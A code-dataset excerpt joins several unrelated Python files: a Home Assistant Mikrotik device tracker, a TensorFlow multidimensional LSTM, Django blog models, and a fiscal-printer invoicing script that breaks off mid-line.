attributes = self._attrs\n return attributes\n\n @property\n def is_connected(self) -> bool:\n return False\n\n\n# ---------------------------\n# MikrotikControllerHostDeviceTracker\n# ---------------------------\nclass MikrotikControllerHostDeviceTracker(MikrotikControllerDeviceTracker):\n \"\"\"Representation of a network device.\"\"\"\n\n def __init__(self, inst, uid, mikrotik_controller, config_entry, sid_data):\n \"\"\"Set up tracked port.\"\"\"\n super().__init__(inst, uid, mikrotik_controller, config_entry, sid_data)\n\n @property\n def option_track_network_hosts(self):\n \"\"\"Config entry option to not track ARP.\"\"\"\n return self._config_entry.options.get(CONF_TRACK_HOSTS, DEFAULT_TRACK_HOSTS)\n\n @property\n def option_track_network_hosts_timeout(self):\n \"\"\"Config entry option scan interval.\"\"\"\n track_network_hosts_timeout = self._config_entry.options.get(\n CONF_TRACK_HOSTS_TIMEOUT, DEFAULT_TRACK_HOST_TIMEOUT\n )\n return timedelta(seconds=track_network_hosts_timeout)\n\n @property\n def is_connected(self) -> bool:\n \"\"\"Return true if the host is connected to the network.\"\"\"\n if not self.option_track_network_hosts:\n return False\n\n if self._data[\"source\"] in [\"capsman\", \"wireless\"]:\n return self._data[\"available\"]\n\n if (\n self._data[\"last-seen\"]\n and (utcnow() - self._data[\"last-seen\"])\n < self.option_track_network_hosts_timeout\n ):\n return True\n return False\n\n @property\n def available(self) -> bool:\n \"\"\"Return if controller is available.\"\"\"\n if not self.option_track_network_hosts:\n return False\n\n return self._ctrl.connected()\n\n @property\n def icon(self) -> str:\n \"\"\"Return the icon.\"\"\"\n if self._data[\"source\"] in [\"capsman\", \"wireless\"]:\n if self._data[\"available\"]:\n return \"mdi:lan-connect\"\n else:\n return \"mdi:lan-disconnect\"\n\n if (\n self._data[\"last-seen\"]\n and (utcnow() - self._data[\"last-seen\"])\n < self.option_track_network_hosts_timeout\n ):\n return \"mdi:lan-connect\"\n return \"mdi:lan-disconnect\"\n\n @property\n def device_state_attributes(self) -> Dict[str, Any]:\n \"\"\"Return the state attributes.\"\"\"\n attributes = self._attrs\n for variable in DEVICE_ATTRIBUTES_HOST:\n if variable not in self._data:\n continue\n\n if variable == \"last-seen\":\n if self._data[variable]:\n attributes[format_attribute(variable)] = get_age(\n self._data[variable]\n )\n else:\n attributes[format_attribute(variable)] = \"unknown\"\n else:\n if self._data[variable] in [\n \"dhcp\",\n \"dns\",\n \"capsman\",\n \"wireless\",\n \"restored\",\n ]:\n attributes[format_attribute(variable)] = format_value(\n self._data[variable]\n )\n else:\n attributes[format_attribute(variable)] = self._data[variable]\n\n return attributes\n\n @property\n def device_info(self) -> Dict[str, Any]:\n \"\"\"Return a description for device registry.\"\"\"\n info = {\n \"connections\": {\n (CONNECTION_NETWORK_MAC, self._data[self._sid_data[\"sid_ref\"]])\n },\n \"default_name\": self._data[self._sid_data[\"sid_name\"]],\n }\n if self._data[\"manufacturer\"] != \"\":\n info[\"manufacturer\"] = self._data[\"manufacturer\"]\n\n if self._sid_data[\"sid\"] == \"interface\":\n info[\"name\"] = f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n\n return info\n","repo_name":"BeardedTinker/Home-Assistant_config_rec","sub_path":"custom_components/mikrotik_router/device_tracker.py","file_name":"device_tracker.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2521819898","text":"import tensorflow as tf\n\ndef ln(tensor, scope = None, epsilon = 1e-5):\n \"\"\" Layer normalizes a 2D tensor along its second axis \"\"\"\n assert(len(tensor.get_shape()) == 2)\n m, v = tf.nn.moments(tensor, [1], keep_dims=True)\n if not isinstance(scope, str):\n scope = ''\n with tf.variable_scope(scope + 'layer_norm'):\n scale = tf.get_variable('scale',\n shape=[tensor.get_shape()[1]],\n initializer=tf.constant_initializer(1))\n shift = tf.get_variable('shift',\n shape=[tensor.get_shape()[1]],\n initializer=tf.constant_initializer(0))\n LN_initial = (tensor - m) / tf.sqrt(v + epsilon)\n\n return LN_initial * scale + shift\n\nfrom tensorflow.contrib.rnn.python.ops.rnn_cell import _linear\n\nclass MultiDimentionalLSTMCell(tf.contrib.rnn.RNNCell):\n \"\"\"\n Adapted from TF's BasicLSTMCell to use Layer Normalization.\n Note that state_is_tuple is always True.\n \"\"\"\n\n def __init__(self, num_units, forget_bias=0.0, activation=tf.nn.tanh):\n self._num_units = num_units\n self._forget_bias = forget_bias\n self._activation = activation\n\n @property\n def state_size(self):\n return tf.contrib.rnn.LSTMStateTuple(self._num_units, self._num_units)\n\n @property\n def output_size(self):\n return self._num_units\n\n def __call__(self, inputs, state, scope=None):\n \"\"\"Long short-term memory cell (LSTM).\n @param: imputs (batch,n)\n @param state: the states and hidden unit of the two cells\n \"\"\"\n with tf.variable_scope(scope or type(self).__name__):\n c1,c2,h1,h2 = state\n\n # change bias argument to False since LN will add bias via shift\n concat = _linear([inputs, h1, h2], 5 * self._num_units, False)\n\n i, j, f1, f2, o = tf.split(concat, 5, 1)\n\n # add layer normalization to each gate\n i = ln(i, scope = 'i/')\n j = ln(j, scope = 'j/')\n f1 = ln(f1, scope = 'f1/')\n f2 = ln(f2, scope = 'f2/')\n o = ln(o, scope = 'o/')\n\n new_c = (c1 * tf.nn.sigmoid(f1 + self._forget_bias) + \n c2 * tf.nn.sigmoid(f2 + self._forget_bias) + tf.nn.sigmoid(i) *\n self._activation(j))\n\n # add layer_normalization in calculation of new hidden state\n new_h = self._activation(ln(new_c, scope = 'new_h/')) * tf.nn.sigmoid(o)\n new_state = tf.contrib.rnn.LSTMStateTuple(new_c, new_h)\n\n return new_h, new_state\n\n \ndef multiDimentionalRNN_whileLoop(rnn_size,input_data,sh,dims=None,scopeN=\"layer1\"):\n \"\"\"Implements naive multidimentional recurent neural networks\n \n @param rnn_size: the hidden units\n @param input_data: the data to process of shape [batch,h,w,chanels]\n @param sh: [heigth,width] of the windows \n @param dims: dimentions to reverse the input data\n @param scopeN : the scope\n \n returns [batch,h/sh[0],w/sh[1],chanels*sh[0]*sh[1]] the output of the lstm\n \"\"\"\n with tf.variable_scope(\"MultiDimentionalLSTMCell-\"+scopeN):\n cell = MultiDimentionalLSTMCell(rnn_size)\n \n shape = input_data.get_shape().as_list()\n\n if shape[1]%sh[0] != 0:\n offset = tf.zeros([shape[0], sh[0]-(shape[1]%sh[0]), shape[2], shape[3]])\n input_data = tf.concat([input_data,offset],1)\n shape = input_data.get_shape().as_list()\n if shape[2]%sh[1] != 0:\n offset = tf.zeros([shape[0], shape[1], sh[1]-(shape[2]%sh[1]), shape[3]])\n input_data = tf.concat([input_data,offset],2)\n shape = input_data.get_shape().as_list()\n\n h,w = int(shape[1]/sh[0]),int(shape[2]/sh[1])\n features = sh[1]*sh[0]*shape[3]\n batch_size = shape[0]\n\n lines = tf.split(input_data,h,axis=1)\n x1 = []\n for line in lines:#shape[0], sh[0], shape[2], shape[3] - bs, sh[0], total width, chanels\n line = tf.transpose(line,[0,2,3,1])\n line = tf.reshape(line,[batch_size,w,features])\n x1.append(line)\n x = tf.stack(x1,axis=1)\n if dims is not None:\n x = tf.reverse(x, dims)\n x = tf.transpose(x, [1,2,0,3])\n x = tf.reshape(x, [-1, features])\n x = tf.split(x, h*w, 0) \n\n sequence_length = tf.ones(shape=(batch_size,), dtype=tf.int32)*shape[0]\n inputs_ta = tf.TensorArray(dtype=tf.float32, size=h*w,name='input_ta')\n inputs_ta = inputs_ta.unstack(x)\n states_ta = tf.TensorArray(dtype=tf.float32, size=h*w+1,name='state_ta',\n clear_after_read=False)\n outputs_ta = tf.TensorArray(dtype=tf.float32, size=h*w,name='output_ta')\n\n states_ta = states_ta.write(h*w, \n tf.contrib.rnn.LSTMStateTuple(\n tf.zeros([batch_size,rnn_size], tf.float32),\n tf.zeros([batch_size,rnn_size],\n tf.float32)))\n def getindex1(t,w):\n return tf.cond(tf.less_equal(tf.constant(w),t),\n lambda:t-tf.constant(w),\n lambda:tf.constant(h*w))\n def getindex2(t,w):\n return tf.cond(tf.less(tf.constant(0),tf.mod(t,tf.constant(w))),\n lambda:t-tf.constant(1),\n lambda:tf.constant(h*w))\n\n time = tf.constant(0)\n\n def body(time, outputs_ta, states_ta):\n constant_val = tf.constant(0)\n stateUp = tf.cond(tf.less_equal(tf.constant(w),time),\n lambda: states_ta.read(getindex1(time,w)),\n lambda: states_ta.read(h*w))\n stateLast = tf.cond(tf.less(constant_val,tf.mod(time,tf.constant(w))),\n lambda: states_ta.read(getindex2(time,w)),\n lambda: states_ta.read(h*w)) \n\n currentState = stateUp[0],stateLast[0],stateUp[1],stateLast[1]\n out , state = cell(inputs_ta.read(time),currentState) \n outputs_ta = outputs_ta.write(time,out)\n states_ta = states_ta.write(time,state)\n return time + 1, outputs_ta, states_ta\n\n def condition(time,outputs_ta,states_ta):\n return tf.less(time , tf.constant(h*w)) \n\n result , outputs_ta, states_ta = tf.while_loop(condition, body, [time,outputs_ta,states_ta]\n ,parallel_iterations=1)\n\n\n outputs = outputs_ta.stack()\n states = states_ta.stack()\n\n y = tf.reshape(outputs, [h,w,batch_size,rnn_size])\n y = tf.transpose(y, [2,0,1,3])\n if dims is not None:\n y = tf.reverse(y, dims)\n\n return y#,states\n\n \ndef tanAndSum(rnn_size,input_data,scope,sh):\n outs = []\n for i in range(2):\n for j in range(2):\n dims = []\n if i!=0:\n dims.append(1)\n if j!=0:\n dims.append(2) \n outputs = multiDimentionalRNN_whileLoop(rnn_size,input_data,sh,\n dims,scope+\"-multi-l{0}\".format(i*2+j))\n outs.append(outputs)\n #return outs\n outs = tf.stack(outs, axis=0)\n mean = tf.reduce_mean(outs, 0)\n return tf.nn.tanh(mean)\n\n","repo_name":"johnsmithm/mdlstm","sub_path":"mdlstm.py","file_name":"mdlstm.py","file_ext":"py","file_size_in_byte":7897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3973021097","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.db.models import UniqueConstraint\n\nUser = get_user_model()\n\n\nclass Posts(models.Model):\n pub_date = models.DateTimeField(\n 'Время публикации',\n auto_now_add=True,\n null=True\n )\n\n class Meta:\n abstract = True\n\n\nclass Group(models.Model):\n title = models.CharField('Название группы', max_length=200)\n slug = models.SlugField('Текст ссылки', unique=True)\n description = models.TextField('Описание группы')\n\n class Meta:\n verbose_name = 'Администрирование группы'\n verbose_name_plural = 'Администрирование групп'\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Post(Posts):\n text = models.TextField('Текст поста', help_text='Введите текст поста')\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n related_name='posts'\n )\n group = models.ForeignKey(\n Group,\n verbose_name='Группа',\n blank=True,\n null=True,\n on_delete=models.SET_NULL,\n related_name='posts',\n help_text='Группа, к которой будет относиться пост'\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n null=True,\n )\n\n class Meta:\n verbose_name = 'Администрирование поста'\n verbose_name_plural = 'Администрирование постов'\n ordering = ('-pub_date',)\n\n def __str__(self) -> str:\n return self.text[:15]\n\n\nclass Comment(Posts):\n post = models.ForeignKey(\n Post,\n verbose_name='Пост',\n on_delete=models.CASCADE,\n related_name='comments'\n )\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n related_name='comments'\n )\n text = models.TextField(\n 'Текст комментария',\n help_text='Введите текст комментария'\n )\n\n class Meta:\n verbose_name = 'Администрирование комментария'\n verbose_name_plural = 'Администрирование комментариев'\n ordering = ('-pub_date',)\n\n def __str__(self) -> str:\n return self.text[:15]\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n verbose_name='Подписчик',\n on_delete=models.CASCADE,\n related_name='follower'\n )\n author = models.ForeignKey(\n User,\n verbose_name='Автор',\n on_delete=models.CASCADE,\n related_name='following'\n )\n\n class Meta:\n verbose_name = 'Администрирование подписки'\n verbose_name_plural = 'Администрирование подписок'\n UniqueConstraint(fields=['user', 'author'], name='unique_following')\n\n def __str__(self) -> str:\n return self.text[:15]\n","repo_name":"kirillkutsko/hw05_final","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70674181288","text":"from datetime import (timedelta, datetime as dt, date as pyDate, time as pyTime)\nfrom operator import index\n\nimport sys\nimport Tfhka\nimport serial\nimport os\nimport time\n\nclass Principal():\n\n\tdef __init__(self):\n\t\tself.printer = Tfhka.Tfhka()\n\t\tself.puerto = ['COM3']\n\t\n\tdef abrir_puerto(self):\n\t\tpuerto = self.puerto[0]\n\t\ttry:\n\t\t\tresp = self.printer.OpenFpctrl(puerto)\n\t\t\tif resp:\n\t\t\t\tprint(\"Impresora Conectada Correctamente en: \" + puerto)\n\t\texcept serial.SerialException:\n\t\t\tprint(\"Impresora no Conectada o Error Accediendo al Puerto\")\n\t\n\tdef reconocer_puerto(self):\n\t\tfor opciones in ['COM11', 'COM10','COM9', 'COM8', 'COM7', 'COM6', 'COM5', 'COM4', 'COM3']:\n\t\t\ttry:\n\t\t\t\tresp = self.printer.OpenFpctrl(opciones)\n\t\t\t\tif resp:\n\t\t\t\t\tprint(\"Impresora Conectada Correctamente en: \" + opciones)\n\t\t\t\t\tself.puerto[0] = opciones\n\t\t\t\t\tresponse = True\n\t\t\texcept:\n\t\t\t\tresponse = False\n\t\treturn response \n\n\tdef cerrar_puerto(self):\n\t\tresp = self.printer.CloseFpctrl()\n\t\tif not resp:\n\t\t\tprint(\"Impresora Desconectada\")\n\t\telse:\n\t\t\tprint(\"Error\")\n\n\tdef programacion(self):\t\n\t\tself.printer.SendCmd(\"D\")\n\n\tdef enviar_cmd(self):\n\t\tcmd = self.txt_cmd.text()\n\t\tself.printer.SendCmd(str(cmd))\n\n\tdef estado_error(self):\n\t\tself.txt_informacion.setText(\"\")\n\t\tself.estado = self.printer.ReadFpStatus()\n\t\tself.txt_informacion.setText(\"Estado: \" + self.estado[0] + \"\\n\" + \"Error: \" + self.estado[5])\n\n\tdef imprimir_ReporteZ(self):\n\t\tself.printer.PrintZReport()\n\n\tdef imprimir_ReporteX(self):\n\t\tself.printer.PrintXReport()\n\n\tdef obtener_estado(self):\n\t\testado = 'S1'\n\n\t\tif estado == \"S1\":\n\t\t\testado_s1 = self.printer.GetS1PrinterData()\n\t\t\tsalida= \"---Estado S1---\\n\" \n\t\t\tsalida+= \"\\nNumero Cajero: \"+ str(estado_s1._cashierNumber) \n\t\t\tsalida+= \"\\nSubtotal Ventas: \" + str(estado_s1._totalDailySales) \n\t\t\tsalida+= \"\\nNumero Ultima Factura: \" + str(estado_s1._lastInvoiceNumber)\n\t\t\tsalida+= \"\\nCantidad Facturas Hoy: \" + str(estado_s1._quantityOfInvoicesToday) \n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \" + str(estado_s1._lastDebtNoteNumber) \n\t\t\tsalida+= \"\\nCantidad Notas de Debito Hoy: \" + str(estado_s1._quantityDebtNoteToday) \n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \" + str(estado_s1._lastNCNumber) \n\t\t\tsalida+= \"\\nCantidad Notas de Credito Hoy: \" + str(estado_s1._quantityOfNCToday) \n\t\t\tsalida+= \"\\nNumero Ultimo Documento No Fiscal: \" + str(estado_s1._numberNonFiscalDocuments) \n\t\t\tsalida+= \"\\nCantidad de Documentos No Fiscales: \" + str(estado_s1._quantityNonFiscalDocuments) \n\t\t\tsalida+= \"\\nCantidad de Reportes de Auditoria: \" + str(estado_s1._auditReportsCounter) \n\t\t\tsalida+= \"\\nCantidad de Reportes Fiscales: \" + str(estado_s1._fiscalReportsCounter)\n\t\t\tsalida+= \"\\nCantidad de Reportes Z: \" + str(estado_s1._dailyClosureCounter)\n\t\t\tsalida+= \"\\nNumero de RIF: \" + str(estado_s1._rif)\n\t\t\tsalida+= \"\\nNumero de Registro: \" + str(estado_s1._registeredMachineNumber)\n\t\t\tsalida+= \"\\nHora de la Impresora: \" + str(estado_s1._currentPrinterTime)\n\t\t\tsalida+= \"\\nFecha de la Impresora: \" + str(estado_s1._currentPrinterDate)\n\t\t\tprint(salida)\n\t\t\t# self.txt_informacion.setText(salida)\n\n\t\tif estado == \"S2\":\n\t\t\testado_s2 = self.printer.GetS2PrinterData()\n\t\t\tsalida= \"---Estado S2---\\n\" \n\t\t\tsalida+= \"\\nSubtotal de BI: \"+ str(estado_s2._subTotalBases) \n\t\t\tsalida+= \"\\nSubtotal de Impuesto: \" + str(estado_s2._subTotalTax) \n\t\t\tsalida+= \"\\nData Dummy: \" + str(estado_s2._dataDummy)\n\t\t\tsalida+= \"\\nCantidad de articulos: \" + str(estado_s2._quantityArticles) \n\t\t\tsalida+= \"\\nMonto por Pagar: \" + str(estado_s2._amountPayable) \n\t\t\tsalida+= \"\\nNumero de Pagos Realizados: \" + str(estado_s2._numberPaymentsMade) \n\t\t\tsalida+= \"\\nTipo de Documento: \" + str(estado_s2._typeDocument) \n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S3\":\n\t\t\testado_s3 = self.printer.GetS3PrinterData()\n\t\t\tsalida= \"---Estado S3---\\n\"\n\t\t\tsalida+= \"\\nTipo Tasa 1 (1 = Incluido, 2= Excluido): \"+ str(estado_s3._typeTax1) \n\t\t\tsalida+= \"\\nValor Tasa 1: \"+ str(estado_s3._tax1) + \" %\"\n\t\t\tsalida+= \"\\nTipo Tasa 2 (1 = Incluido, 2= Excluido): \" + str(estado_s3._typeTax2) \n\t\t\tsalida+= \"\\nValor Tasa2: \" + str(estado_s3._tax2) + \" %\"\n\t\t\tsalida+= \"\\nTipo Tasa 3 (1 = Incluido, 2= Excluido): \" + str(estado_s3._typeTax3) \n\t\t\tsalida+= \"\\nValor Tasa 3: \" + str(estado_s3._tax3) + \" %\"\n\t\t\tsalida+= \"\\n\\nLista de Flags: \" + str(estado_s3._systemFlags)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S4\":\n\t\t\testado_s4 = self.printer.GetS4PrinterData()\n\t\t\tsalida= \"---Estado S4---\\n\"\n\t\t\tsalida+= \"\\nMontos en Medios de Pago: \" + str(estado_s4._allMeansOfPayment)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S5\":\n\t\t\testado_s5 = self.printer.GetS5PrinterData()\n\t\t\tsalida= \"---Estado S5---\\n\"\n\t\t\tsalida+= \"\\nNumero de RIF: \"+ str(estado_s5._rif) \n\t\t\tsalida+= \"\\nNumero de Registro: \" + str(estado_s5._registeredMachineNumber) \n\t\t\tsalida+= \"\\nNumero de Memoria de Auditoria : \" + str(estado_s5._auditMemoryNumber)\n\t\t\tsalida+= \"\\nCapacidad Total de Memoria Auditoria: \" + str(estado_s5._auditMemoryTotalCapacity) + \" MB\" \n\t\t\tsalida+= \"\\nEspacio Disponible: \" + str(estado_s5._auditMemoryFreeCapacity) + \" MB\" \n\t\t\tsalida+= \"\\nCantidad Documentos Registrados: \" + str(estado_s5._numberRegisteredDocuments)\n\t\t\tself.txt_informacion.setText(salida)\n\n\t\tif estado == \"S6\":\n\t\t\testado_s6 = self.printer.GetS6PrinterData()\n\t\t\tsalida= \"---Estado S6---\\n\"\n\t\t\tsalida+= \"\\nModo Facturacion: \"+ str(estado_s6._bit_Facturacion) \n\t\t\tsalida+= \"\\nModo Slip: \" + str(estado_s6._bit_Slip) \n\t\t\tsalida+= \"\\nModo Validacion: \" + str(estado_s6._bit_Validacion) \n\t\t\tself.txt_informacion.setText(salida)\n\n\tdef obtener_reporteZ(self):\n\t\treporte = self.printer.GetZReport()\n\t\tsalida= \"Numero Ultimo Reporte Z: \"+ str(reporte._numberOfLastZReport) \n\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reporte._zReportDate) \n\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reporte._zReportTime) \n\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reporte._numberOfLastInvoice) \n\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reporte._lastInvoiceDate) \n\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reporte._lastInvoiceTime)\n\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reporte._numberOfLastDebitNote)\n\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reporte._numberOfLastCreditNote)\n\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reporte._numberOfLastNonFiscal)\n\t\tsalida+= \"\\nVentas Exento: \"+ str(reporte._freeSalesTax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reporte._generalRate1Sale)\n\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reporte._generalRate1Tax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reporte._reducedRate2Sale)\n\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reporte._reducedRate2Tax)\n\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reporte._additionalRate3Sal)\n\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reporte._additionalRate3Tax)\n\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reporte._freeTaxDebit)\n\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reporte._generalRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA G en Nota de Debito: \"+ str(reporte._generalRateTaxDebit)\n\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reporte._reducedRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA R en Nota de Debito: \"+ str(reporte._reducedRateTaxDebit)\n\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reporte._additionalRateDebit)\n\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reporte._additionalRateTaxDebit)\n\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reporte._freeTaxDevolution)\n\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reporte._generalRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA G en Nota de Credito: \"+ str(reporte._generalRateTaxDevolution)\n\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reporte._reducedRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reporte._reducedRateTaxDevolution)\n\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reporte._additionalRateDevolution)\n\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reporte._additionalRateTaxDevolution)\n\t\tself.txt_informacion.setText(salida)\n\n\tdef obtener_reporteX(self):\n\t\treporte = self.printer.GetXReport()\n\t\treturn reporte\n\n\tdef ImpZpornumero(self):\n\t\tn_ini = self.imp_num_ini.value()\n\t\tn_fin = self.imp_num_fin.value()\n\t\tself.printer.PrintZReport(\"A\",n_ini,n_fin)\n\n\tdef ImpZporfecha(self):\n\t\tn_ini = self.imp_date_ini.date().toPyDate()\n\t\tn_fin = self.imp_date_fin.date().toPyDate()\n\t\tself.printer.PrintZReport(\"A\",n_ini,n_fin)\n\n\tdef factura(self, **params):\t\n\t\tmetodos_pago = {\"TRANSFERENCE\":\"TRANSFERENCIA\", \"MOBILE PAYMENT\":\"PAGO MOVIL\", \"CASH\": \"EFECTIVO\", \"CARD\":\"TARJETA DEBITO\",\\\n\t\t\t \"WALLET\": \"TRANSFERENCIA\", \"CREDIT\": \"CREDITO\"}\n\t\tself.printer.SendCmd(str(f\"i00CLIENTE: {params.get('cliente')}\"))\n\t\tself.printer.SendCmd(str(f\"i01DOCUMENTO: {params.get('documento')}\"))\n\t\tself.printer.SendCmd(str(f\"i02DIRECCION: {params.get('direccion')}\"))\n\t\tself.printer.SendCmd(str(f\"i03TELEFONO: {params.get('telefono')}\"))\n\t\tself.printer.SendCmd(str(f\"i04CAJERO: {params.get('cajero').get('seller')}\"))\n\t\tself.printer.SendCmd(str(f\"i05{params.get('cajero').get('safeBox')}\"))\n\t\tfor producto in params.get(\"lista_productos\"):\n\t\t\tself.printer.SendCmd(producto)\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tif len(params.get(\"pago\")) > 1:\n\t\t\tfor index, metodo in enumerate(params.get(\"pago\"), start=1):\n\t\t\t\tp_entero, p_decimal = metodo.get(\"amount\").split('.')\n\t\t\t\ttipo = metodos_pago.get(metodo.get(\"paymentMethod\"))\n\t\t\t\tself.printer.SendCmd(str(f\"20{index}{(('0') * (10 - len(p_entero))) + p_entero}{p_decimal}{tipo}\")) # Tipo de pago\n\t\telse:\n\t\t\tself.printer.SendCmd(str(f\"101{metodos_pago.get(params.get('pago')[0].get('paymentMethod'))}\"))\n\n\tdef facturaper(self):\n\t\t#Factura Personalizada\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"@COMMENT/COMENTARIO\"))\n\t\tself.printer.SendCmd(str(\" 000000030000001000Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"!000000050000001000Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str('\"' + \"000000070000001000Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"#000000090000001000Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tself.printer.SendCmd(str(\"101\"))\n\n\tdef facturaanu(self):\n\t\t#Factura Anulada\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"@COMMENT/COMENTARIO\"))\n\t\tself.printer.SendCmd(str(\" 000000030000001000Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"!000000050000001000Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str('\"' + \"000000070000001000Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"#000000090000001000Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"7\"))\n\n\tdef documentoNF(self):\n\t\t#Documento No Fiscal\n\t\tself.printer.SendCmd(str(\"80$Documento de Prueba\"))\n\t\tself.printer.SendCmd(str(\"80¡Esto es un documento de texto\"))\n\t\tself.printer.SendCmd(str(\"80!Es un documento no fiscal\"))\n\t\tself.printer.SendCmd(str(\"80*Es bastante util y versatil\"))\n\t\tself.printer.SendCmd(str(\"810Fin del Documento no Fiscal\"))\n\n\tdef notaCredito(self, **params):\n\t\tmetodos_pago = {\"TRANSFERENCE\":\"TRANSFERENCIA\", \"MOBILE PAYMENT\":\"PAGO MOVIL\", \"CASH\": \"EFECTIVO\", \"CARD\":\"TARJETA DEBITO\",\\\n\t\t\t\t\"WALLET\": \"TRANSFERENCIA\"}\n\t\t#Nota de Credito\n\t\tself.printer.SendCmd(f\"iR*{params.get('documento')}\")\n\t\tself.printer.SendCmd(f\"iS*{params.get('cliente')}\")\n\t\tself.printer.SendCmd(f\"i00TELEFONO: {params.get('telefono')}\")\n\t\tself.printer.SendCmd(f\"i02DIRECCION: {params.get('direccion')}\")\n\t\tself.printer.SendCmd(f\"iF*{params.get('n_factura')}\")\n\t\tself.printer.SendCmd(f\"iD*{dt.now().strftime('%d/%m/%y')}\")\n\t\tself.printer.SendCmd(f\"iI*{params.get('serial')}\")\n\t\tfor producto in params.get(\"lista_productos\"):\n\t\t\tself.printer.SendCmd(producto)\n\t\tself.printer.SendCmd(\"3\")\n\t\tif len(params.get(\"pago\")) > 1:\n\t\t\tfor index, metodo in enumerate(params.get(\"pago\"), start=1):\n\t\t\t\tp_entero, p_decimal = metodo.get(\"amount\").split('.')\n\t\t\t\ttipo = metodos_pago.get(metodo.get(\"paymentMethod\"))\n\t\t\t\tself.printer.SendCmd(str(f\"20{index}{(('0') * (10 - len(p_entero))) + p_entero}{p_decimal}{tipo}\")) # Tipo de pago\n\t\telse:\n\t\t\tself.printer.SendCmd(str(f\"101{metodos_pago.get(params.get('pago')[0].get('paymentMethod'))}\"))\n\n\tdef notaDebito(self):\n\t\tself.printer.SendCmd(str(\"iR*21.122.012\"))\n\t\tself.printer.SendCmd(str(\"iS*Pedro Perez\"))\n\t\tself.printer.SendCmd(str(\"iF*00000000001\"))\n\t\tself.printer.SendCmd(str(\"iD*22/08/2016\"))\n\t\tself.printer.SendCmd(str(\"iI*Z1F1234567\"))\n\t\tself.printer.SendCmd(str(\"i00Direccion: Ppal Siempre Viva\"))\n\t\tself.printer.SendCmd(str(\"i01Telefono: +58(212)555-55-55\"))\n\t\tself.printer.SendCmd(str(\"i02CAJERO: 00001\"))\n\t\tself.printer.SendCmd(str(\"BCOMENTARIO NOTA DE DEBITO\"))\n\t\tself.printer.SendCmd(str(\"`0\" + \"000000003000000100Tax Free/Producto Exento\"))\n\t\tself.printer.SendCmd(str(\"`1\" + \"100000005000000100Tax Rate 1/Producto Tasa General\"))\n\t\tself.printer.SendCmd(str(\"`2\" + 